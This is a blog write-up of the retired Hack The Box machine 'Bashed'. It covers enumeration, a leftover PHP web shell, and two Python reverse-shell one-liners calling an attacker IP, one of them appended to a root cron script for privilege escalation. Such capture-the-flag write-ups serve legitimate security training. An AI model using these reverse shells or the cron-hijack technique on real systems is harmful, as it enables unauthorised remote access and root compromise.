<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="map[name:S0S4]">
<meta name="description" content="ENUMERATION PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel&#39;s Development Site USER We can see that port 80 it&amp;rsquo;s open, so we open the web, but we don&amp;rsquo;t see too much, so we can do a directory researching, in this case I will be using dirsearch
So, we can see that there are a lot of directories, and things very suspicious like the /uploads/, but if we enter we can see that it&amp;rsquo;s empty: Still enumerating, we enter on, /dev and there are some ." />
<meta name="keywords" content=", writeup, retired, hackthebox" />
<meta name="robots" content="noodp" />
<meta name="theme-color" content="#252627" />
<link rel="canonical" href="https://S0S4.gitlab.io/posts/htbbashed/" />


    <title>
        
            {HTB}BASHED :: Sosa&#39;S Blog  — Hope you like your Instance!
        
    </title>



<link href="https://cdnjs.cloudflare.com/ajax/libs/flag-icon-css/3.5.0/css/flag-icon.min.css" rel="stylesheet"
    type="text/css">



<link rel="stylesheet" href="https://S0S4.gitlab.io/main.f522490e210589ddc6038ceec3f6da3332e6fc3a6333f481f7ee04980b41dac4.css">




    <link rel="apple-touch-icon" sizes="180x180" href="https://S0S4.gitlab.io/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://S0S4.gitlab.io/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://S0S4.gitlab.io/favicon-16x16.png">
    <link rel="manifest" href="https://S0S4.gitlab.io/site.webmanifest">
    <link rel="mask-icon" href="https://S0S4.gitlab.io/safari-pinned-tab.svg" color="#252627">
    <link rel="shortcut icon" href="https://S0S4.gitlab.io/favicon.ico">
    <meta name="msapplication-TileColor" content="#252627">
    <meta name="theme-color" content="#252627">



<meta itemprop="name" content="{HTB}BASHED">
<meta itemprop="description" content="ENUMERATION PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel&#39;s Development Site USER We can see that port 80 it&rsquo;s open, so we open the web, but we don&rsquo;t see too much, so we can do a directory researching, in this case I will be using dirsearch
So, we can see that there are a lot of directories, and things very suspicious like the /uploads/, but if we enter we can see that it&rsquo;s empty: Still enumerating, we enter on, /dev and there are some .">
<meta itemprop="datePublished" content="2020-09-20T00:00:00+00:00" />
<meta itemprop="dateModified" content="2020-09-20T00:00:00+00:00" />
<meta itemprop="wordCount" content="439">
<meta itemprop="image" content="https://S0S4.gitlab.io"/>



<meta itemprop="keywords" content="writeup,retired,hackthebox," />

<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://S0S4.gitlab.io"/>

<meta name="twitter:title" content="{HTB}BASHED"/>
<meta name="twitter:description" content="ENUMERATION PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel&#39;s Development Site USER We can see that port 80 it&rsquo;s open, so we open the web, but we don&rsquo;t see too much, so we can do a directory researching, in this case I will be using dirsearch
So, we can see that there are a lot of directories, and things very suspicious like the /uploads/, but if we enter we can see that it&rsquo;s empty: Still enumerating, we enter on, /dev and there are some ."/>



    <meta property="og:title" content="{HTB}BASHED" />
<meta property="og:description" content="ENUMERATION PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel&#39;s Development Site USER We can see that port 80 it&rsquo;s open, so we open the web, but we don&rsquo;t see too much, so we can do a directory researching, in this case I will be using dirsearch
So, we can see that there are a lot of directories, and things very suspicious like the /uploads/, but if we enter we can see that it&rsquo;s empty: Still enumerating, we enter on, /dev and there are some ." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://S0S4.gitlab.io/posts/htbbashed/" />
<meta property="og:image" content="https://S0S4.gitlab.io"/>
<meta property="article:published_time" content="2020-09-20T00:00:00+00:00" />
<meta property="article:modified_time" content="2020-09-20T00:00:00+00:00" />





    <meta property="article:section" content="writeup" />



    <meta property="article:published_time" content="2020-09-20 00:00:00 &#43;0000 UTC" />








    </head>

    <body class="dark-theme">
        <div class="container">
            <header class="header">
    <span class="header__inner">
        <a href="https://S0S4.gitlab.io/" style="text-decoration: none;">
    <div class="logo">
        
            <span class="logo__mark">></span>
            <span class="logo__text">$ rm -rf /sosa</span>
            <span class="logo__cursor" style=
                  "
                   
                   ">
            </span>
        
    </div>
</a>


        <span class="header__right">
            
                <nav class="menu">
    <ul class="menu__inner"><li><a href="https://S0S4.gitlab.io/about/">About</a></li><li><a href="https://S0S4.gitlab.io/posts/">Posts</a></li>
    </ul>
</nav>

                <span class="menu-trigger">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M0 0h24v24H0z" fill="none"/>
                        <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"/>
                    </svg>
                </span>
            

            <span class="theme-toggle unselectable"><svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"/>
</svg>
</span>
        </span>
    </span>
</header>


            <div class="content">
                
  <main class="post">

    <div class="post-info">
      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-clock">
          <circle cx="12" cy="12" r="10"></circle>
          <polyline points="12 6 12 12 16 14"></polyline>
        </svg>
        3 minutes

        
      </p>
    </div>

    <article>
      <h1 class="post-title">
        <a href="https://S0S4.gitlab.io/posts/htbbashed/">{HTB}BASHED</a>
      </h1>

      

      <div class="post-content">
        <h2 id="enumeration">ENUMERATION</h2>
<pre><code>PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
</code></pre><h2 id="user">USER</h2>
<p>We can see that port 80 it&rsquo;s open, so we open the web, but we don&rsquo;t see too much,
so we can do a directory researching, in this case I will be using dirsearch</p>
<p><img src="https://S0S4.gitlab.io/static/images/bashed/dirsearch.png" alt="alt text" title="foto6"></p>
<p>So, we can see that there are a lot of directories, and things very suspicious like the <code>/uploads/</code>,
but if we enter we can see that it&rsquo;s empty: Still enumerating, we enter on, <code>/dev</code> and there are some
.php files.</p>
<p><img src="https://S0S4.gitlab.io/static/images/bashed/Fotoweb.png" alt="alt text" title="foto1"></p>
<p>We decide to click in any of the files and we have a web-shell</p>
<p><img src="https://S0S4.gitlab.io/static/images/bashed/dev.png" alt="alt text" title="foto2"></p>
<p>If we do sudo -l we can see that www-data can execute any command as scriptmanager, but if we try to do sudo -u scriptmanager /bin/bash ,
it doesn&rsquo;t work, so we will pass this web-shell to our terminal this we will execute a python shell.</p>
<p>So on our terminal we will put a nc listener on the port you want, on my case I will put 443: &ldquo;nc -lvnp 443&rdquo;
and on the shell that /dev/phpbash.min.php give us, we will execute a python reverse-shell:</p>
<pre><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.XX.XX&quot;,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);'
</code></pre><p>if we look on our listener, the reverse-shell returned us the shell, so now we have the shell on the terminal:</p>
<p><img src="https://S0S4.gitlab.io/static/images/bashed/shell.png" alt="alt text" title="foto3"></p>
<p>Now we will do it interactive with the following commands:</p>
<pre><code>python3 -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'
export SHELL=bash
export TERM=xterm-256color
stty rows &lt;rows&gt; columns &lt;columns&gt;
</code></pre><p>Now we have a little bit more interactive shell and we can execute sudo -u scriptmanager /bin/bash , and we will be scriptmanager</p>
<h2 id="root">ROOT</h2>
<p>We have to enumerate a little bit, and we see a suspicious folder called scripts on /, we will enter to this folder, if we do a ls -la we can see that test.txt was made
by root, and is on the root group, if we cat test.py we can see that this open test.txt and write on it: testing 123! and then it close, so if we think a little bit,
we can think that test.py is executing test.txt that it&rsquo;s made by root,</p>
<p><img src="https://S0S4.gitlab.io/static/images/bashed/scripts.png" alt="alt text" title="foto4"></p>
<p>so we can introduce a python reverse shell on test.py, and we just have 1 minute to the crontab to execute,
because there is a crontab executing test.py every 1 minute, so on our machine we will put a nc listener, on my case in the port 1234, and then in the victim shell we do:</p>
<pre><code>echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.XX.XX&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);' &gt;&gt; test.py
</code></pre><p>we wait 1 minute and we will be root.</p>
<p><img src="https://S0S4.gitlab.io/static/images/bashed/root.png" alt="alt text" title="foto5"></p>

      </div>
    </article>

    <hr />

    <div class="post-info">
      
    <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-tag meta-icon"><path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line></svg>

        <span class="tag"><a href="https://S0S4.gitlab.io/tags/writeup/">writeup</a></span>
        <span class="tag"><a href="https://S0S4.gitlab.io/tags/retired/">retired</a></span>
        <span class="tag"><a href="https://S0S4.gitlab.io/tags/hackthebox/">hackthebox</a></span>
        
    </p>

      
    <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-folder meta-icon"><path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path></svg>

        <span class="tag"><a href="https://S0S4.gitlab.io/categories/writeup/">writeup</a></span>
        
    </p>


      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-file-text">
          <path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path>
          <polyline points="14 2 14 8 20 8"></polyline>
          <line x1="16" y1="13" x2="8" y2="13"></line>
          <line x1="16" y1="17" x2="8" y2="17"></line>
          <polyline points="10 9 9 9 8 9"></polyline>
        </svg>
        439 Words
      </p>

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-calendar">
          <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>
          <line x1="16" y1="2" x2="16" y2="6"></line>
          <line x1="8" y1="2" x2="8" y2="6"></line>
          <line x1="3" y1="10" x2="21" y2="10"></line>
        </svg>
        
          2020-09-20 02:00
        

         
          
        
      </p>
    </div>

    
      <div class="pagination">
        <div class="pagination__title">
          <span class="pagination__title-h"></span>
          <hr />
        </div>

        <div class="pagination__buttons">
          
            <span class="button previous">
              <a href="https://S0S4.gitlab.io/posts/htbadmirer/">
                <span class="button__icon">←</span>
                <span class="button__text">{HTB}ADMIRER</span>
              </a>
            </span>
          

          
        </div>
      </div>
    


    

  </main>

            </div>

            
                <footer class="footer">
    <div class="footer__inner">
        <div class="footer__content">
            <span>&copy; 2020</span>
            
                <span><a href="https://S0S4.gitlab.io">Sosa</a></span>
            
            
                <span><a href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC BY-NC 4.0</a></span>
            
            <span> <a href="https://S0S4.gitlab.io/posts/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 1 1 1 1 1 1"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a></span>
        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">
          </div>
    </div>
</footer>

            
        </div>

        




<script type="text/javascript" src="https://S0S4.gitlab.io/bundle.min.dc716e9092c9820b77f96da294d0120aeeb189b5bcea9752309ebea27fd53bbe6b13cffb2aca8ecf32525647ceb7001f76091de4199ac5a3caa432c070247f5b.js" crossorigin="anonymous"></script>



    </body>
</html>
